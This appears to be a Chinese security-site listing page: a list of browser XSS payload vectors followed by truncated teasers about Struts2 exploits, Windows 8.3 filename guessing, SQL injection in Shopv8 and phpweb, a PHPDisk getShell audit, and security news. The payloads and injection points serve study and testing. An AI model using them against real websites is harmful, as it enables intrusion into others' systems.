<!-- " --!><input value="><img src=xx:x onerror=alert(1)//"> <script/onload=alert(1)></script> IE9 <style/onload=alert(1)> alert([0x0D]-->[0x0D]1<!--[0x0D]) 1<!--i document.write('<img src="<iframe/onload=alert(1)>\0">'); IE8 JSON.parse('{"__proto__":["a",1]}') location++ IE valid syntax: 我，啊=1,b=[我，啊],alert(我，啊) alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog <svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera Function('alert(arguments.callee.caller)')() firefox dos? while(1)find(); <div/style=x:expression(alert(URL=1))> Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode! <applet

关于struts2的漏洞原理，空虚浪子心分析的已经非常详尽了。 我这里只是对于构造exp的补充。 现在流传的exp 大致写法和我之前在http:/

前日（7月3日）美国另一家做空调研机构AnonymousAnalytics（匿名分析）在其网站发布针对奇虎360的质疑报告，认为奇虎360存

今天看到一个新闻，现在很多【返利网站】实际是打折返利的幌子，做传销。我下意识的就联想到了这2个软件。 因为之前我就一直觉得这2个软件，其实就是

by marion at 20090324 in GFDL ====================源自DOS时代的8.3格式文件名规范==================== 所谓8.3格

本文翻译自exploit-db.com,是苦逼阿德马童鞋经过数小时折腾而成,转载请著名出处,tks.E文太菜,如果有错误之处请各位大大多多指

本报汉中讯（记者陈卫平）昨天上午，有网友向记者爆料，汉中市中心血站及汉中某高校网站在6月30日曾遭黑客攻击，主页被完全篡改。经调查了解，黑客

Windows 短文件名(8.3) - 一个安全噩梦？ 看不懂英文？没关系，用谷歌翻译…… Each time you create a new file on Windows, the operating system also generates an MS-DOS-compatible short file name in 8.3 format, to allow MS-DOS-based or 16-bit Windows-based programs to access files which have a

http://www.exploit-db.com/wp-content/themes/exploit/docs/19527.pdf http://www.acunetix.com/blog/web-security-zone/articles/windows-short-8-3-filenames-web-security-problem/ 文档已经说得很清楚了，简单的说下： 通过* ? ~组合可以猜目录名和文件名，使用short filenames文件名，可以直接访问文件。 用这个方

为应对国外黑客的网络攻击，韩国政府开始启动“白色黑客”（具有善意目的的黑客）培养计划，计划投入19亿韩元（约合167万美元），培养大约6名“

不知道大家有没有用过一款名为QQExt的QQ外挂，这款稳定的插件今后或许再也不会更新了。5月17日凌晨，QQExt作者刘洋在家中不幸去世，年

犯罪嫌疑人郭俊在湖北荆门落网。图/长沙市公安局 红网长沙7月3日讯（潇湘晨报记者 龚柏威 实习生 王渠平 通讯员 孔奕）“郭俊被

据知情人透漏，奇虎360公司作为我国知名信息安全企业，已经成功加入中国GFW防火长城计划，为中国的信息安全事业保驾护航。早在在2005年的时

一般都是用myodbc来连接。首先，在系统中安装 Mysql 的ODBC数据库驱动。如安装稳定版本是3.51.下载地址是：http:

Shopv8 商城系统 v12.07，程序下载：http://www.mycodes.net/20/1099.htm 漏洞文件：list.asp http://127.0.0.1/list.asp?id=338 注入中转爆

两组研究人员正在研发新的数据传输技术，利用扭曲缠绕的光束和无线电波，能够大幅提高数据传输量 天线传输的无线电波呈螺丝锥形，好似一个旋涡，每一个

本报讯 据人民网消息，据法国媒体6月28日报道，美国一份保安报告显示，最近有不法分子对银行发动一轮网络攻击，欧美及其他地区的多个银行户头已被盗

因为某站用的这个系统  旁站也无从下手 所以就下了份源码来读 整套程序过滤的还是比较全面的  不过所有版本都是GBK编码是他的硬

t00ls新浪微博：http://weibo.com/t00lsnet   T00ls安全 t00ls论坛事务处理：admi

IIS 6.0 IP 地址限制辅助工具 v1.0 Name: IIS 6.0 IP 地址限制辅助工具 v1.0 Author: Nuclear'Atk Url: https://lcx.cc/ Time: 2012-06-19 16:15:29   显示所有网站参数： iis.exe ShowAllWeb [网站ID]，可以用 iis.exe ShowAllWeb 得到！ 显示所有网站禁止的IP

phpweb下的一套酒店系统。 news/html/index.php //定义模块名和页面名 PageSet("news","detail"); 跟踪PageSet函数。 function pageset( $coltype, $pagename ) { global $GLOBALS['msql']; $msql->query( "select * from {P}_base_pageset where coltype='{$coltype}' and pagename='{$pagename}'" ); //....省略代码N行

某群中看到一个笑话，内容如下： 在公厕里，忽然听到厕间有人说话，“朋友，有手纸吗？” 我翻了翻口袋，“抱歉，没有。” 过了几秒钟，那人又问：“朋友

中新网6月29日电 据英国媒体28日报道，英国政府考虑从网络用户的角度着手，设法使色情网站被自动过滤，以减少未成年人被动接触网上这类有害内容的

29岁的俄勒冈州居民 Ryan Harris因教唆用户破解或加速自己的电缆调制解调器而被判三年有期徒刑。此外，他还被判处

在IE中javascript的字符串可以被NULL字符截断,不过仅仅是getValue的时候截断. 测试代码: alert('abc\0 def') 如果只是这样最多就是spoo

我们使用ADSI来操作IIS的时候，需要提供他们的Path。比如默认本机80端口的默认站点的目录路径就是：IIS://localhost/w

通常HTTP消息包括客户机向服务器的请求消息和服务器向客户机的响应消息。这两种类型的消息由一个起始行，一个或者多个头域，一个只是头域结束的空

Phpdisk header bypass & getShell Author:Yaseng    Team:CodePlay   1:代码审计 PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有

PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的东东…..

上大学那会玩过，不过当时小，小打小闹，几百、几十话费就算了。 电信运营商，特别是移动最最强调服务，所以对投诉考核特别严格。 但是，移动的KPI，